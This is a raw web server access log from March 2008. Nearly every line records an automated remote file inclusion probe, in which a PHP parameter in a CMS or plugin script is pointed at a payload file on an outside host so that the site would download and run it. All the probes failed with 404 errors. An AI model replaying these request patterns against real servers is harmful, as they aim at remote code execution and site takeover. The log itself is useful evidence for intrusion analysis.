216.191.16.14 - - [02/Mar/2008:10:08:45 -0800] "GET /errors.php?error=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.191.16.14 - - [02/Mar/2008:10:08:46 -0800] "GET /logs/errors.php?error=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:10:09:23 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:10:09:24 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:10:09:24 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:10:09:25 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:10:09:25 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [02/Mar/2008:10:09:25 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
72.9.159.178 - - [02/Mar/2008:10:09:48 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:10:09:48 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:10:09:48 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:10:09:49 -0800] "GET /logs/access_080121.log/modules/My_eGallery/index.php?basepath=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:10:09:50 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
85.219.199.216 - - [02/Mar/2008:10:09:50 -0800] "GET /modules/My_eGallery/index.php?basepath=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
208.226.79.133 - - [02/Mar/2008:10:11:24 -0800] "GET /logs/main.php?pageURL=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [02/Mar/2008:10:11:25 -0800] "GET /main.php?pageURL=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.216 - - [02/Mar/2008:10:11:48 -0800] "GET /logs/popup_window.php?site_isp_root=http://www.karataudio.com/ksite/components/com_zoom/lib/echo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.230.21.216 - - [02/Mar/2008:10:11:52 -0800] "GET /popup_window.php?site_isp_root=http://www.karataudio.com/ksite/components/com_zoom/lib/echo.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:10:11:58 -0800] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:10:11:58 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:10:11:59 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.202.2.69 - - [02/Mar/2008:10:12:19 -0800] "GET /logs/access_080128.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [02/Mar/2008:10:12:34 -0800] "GET /logs/access_080128.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:10:12:47 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:10:12:48 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.111.157 - - [02/Mar/2008:10:12:48 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.2.69 - - [02/Mar/2008:10:12:53 -0800] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [02/Mar/2008:10:13:13 -0800] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.2.69 - - [02/Mar/2008:10:13:31 -0800] "GET /logs/access_080127.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:10:13:44 -0800] "GET /logs/access_080124.log//modules/TotalCalendar/about.php?inc_dir=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:13:46 -0800] "GET /index.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:13:46 -0800] "GET /logs/index.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:13:47 -0800] "GET /index.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
211.202.2.69 - - [02/Mar/2008:10:13:47 -0800] "GET /logs/access_080127.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:13:47 -0800] "GET /logs/index.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:13:48 -0800] "GET /index.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:13:48 -0800] "GET /logs/index.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.27.112 - - [02/Mar/2008:10:14:12 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.19.173 - - [02/Mar/2008:10:14:13 -0800] "GET /bikes/GPS/WeSTOC2006/?M=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
68.161.236.45 - - [02/Mar/2008:10:15:01 -0800] "GET /ipblock.inc.php?path_escape=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
68.161.236.45 - - [02/Mar/2008:10:15:02 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
68.161.236.45 - - [02/Mar/2008:10:15:02 -0800] "GET /ipblock.inc.php?path_escape=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
68.161.236.45 - - [02/Mar/2008:10:15:02 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
68.161.236.45 - - [02/Mar/2008:10:15:02 -0800] "GET /ipblock.inc.php?path_escape=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
68.161.236.45 - - [02/Mar/2008:10:15:02 -0800] "GET /logs/ipblock.inc.php?path_escape=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:15:15 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:15:15 -0800] "GET /ipblock.inc.php?path_escape=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:15:16 -0800] "GET /ipblock.inc.php?path_escape=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:15:16 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:15:17 -0800] "GET /ipblock.inc.php?path_escape=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:15:17 -0800] "GET /logs/ipblock.inc.php?path_escape=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
70.87.58.146 - - [02/Mar/2008:10:15:19 -0800] "GET /main.php?pageURL=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [02/Mar/2008:10:15:24 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/p4n93r4nk0d0k/computare/heer.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.126.239.14 - - [02/Mar/2008:10:15:30 -0800] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.22.112.178 - - [02/Mar/2008:10:15:33 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/p4n93r4nk0d0k/computare/heer.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:10:15:33 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:10:15:34 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.136.237 - - [02/Mar/2008:10:15:34 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.155.131.97 - - [02/Mar/2008:10:15:49 -0800] "GET /ipblock.inc.php?path_escape=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
201.155.131.97 - - [02/Mar/2008:10:15:49 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
201.155.131.97 - - [02/Mar/2008:10:15:50 -0800] "GET /ipblock.inc.php?path_escape=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.155.131.97 - - [02/Mar/2008:10:15:50 -0800] "GET /logs/ipblock.inc.php?path_escape=http://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.155.131.97 - - [02/Mar/2008:10:15:50 -0800] "GET /ipblock.inc.php?path_escape=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
201.155.131.97 - - [02/Mar/2008:10:15:50 -0800] "GET /logs/ipblock.inc.php?path_escape=http://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.169.168.26 - - [02/Mar/2008:10:15:56 -0800] "GET /index.php?option=com_hello_world&Itemid=&mosConfig_absolute_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
81.169.168.26 - - [02/Mar/2008:10:15:56 -0800] "GET /logs/index.php?option=com_hello_world&Itemid=&mosConfig_absolute_path=http://www.marthamaria-halle.de//cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:10:17:06 -0800] "GET /logs/access_080207.log/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:10:17:06 -0800] "GET /index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:10:17:06 -0800] "GET /logs/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:10:17:52 -0800] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.7.68 - - [02/Mar/2008:10:17:53 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:10:17:53 -0800] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
211.233.7.68 - - [02/Mar/2008:10:17:53 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:10:18:37 -0800] "GET /logs/access_080216.log/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:10:18:37 -0800] "GET /errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:10:18:37 -0800] "GET /logs/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.243.54.131 - - [02/Mar/2008:10:18:39 -0800] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [02/Mar/2008:10:18:40 -0800] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [02/Mar/2008:10:18:40 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.lennoxpetroleum.com/forum/db/db.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
216.29.152.248 - - [02/Mar/2008:10:18:42 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.karataudio.com/ksite/components/com_zoom/lib/echo.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.29.152.248 - - [02/Mar/2008:10:18:44 -0800] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.karataudio.com/ksite/components/com_zoom/lib/echo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:18:49 -0800] "GET /logs/index2.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:18:51 -0800] "GET /logs/index2.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:18:53 -0800] "GET /logs/index2.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:18:59 -0800] "GET /index2.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:19:00 -0800] "GET /index2.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.vacc.org/amember/data/mod/0/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:19:02 -0800] "GET /index2.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://mjfschcomputers.zapto.org/mechanics/calendar/webcalendar-1.0.4/tools/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
212.17.26.135 - - [02/Mar/2008:10:19:07 -0800] "GET //blocks/block_site_map.php?root_folder_path=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.17.26.135 - - [02/Mar/2008:10:19:07 -0800] "GET /logs//blocks/block_site_map.php?root_folder_path=http://www.ehlcc.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
201.47.239.60 - - [02/Mar/2008:10:19:50 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.117 - - [02/Mar/2008:10:19:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.117 - - [02/Mar/2008:10:19:52 -0800] "GET / HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.47.239.60 - - [02/Mar/2008:10:19:52 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:10:20:53 -0800] "GET /logs/access_080207.log/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.47.239.60 - - [02/Mar/2008:10:22:05 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.29.152.248 - - [02/Mar/2008:10:23:21 -0800] "GET /logs/access_080216.log//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.mrcomp.ru/abf94b32b16c995faf109f731a015c8a/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:23:21 -0800] "GET /index3.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
194.65.16.66 - - [02/Mar/2008:10:23:21 -0800] "GET /logs/index3.php?components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=%20extcalendarhttp://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
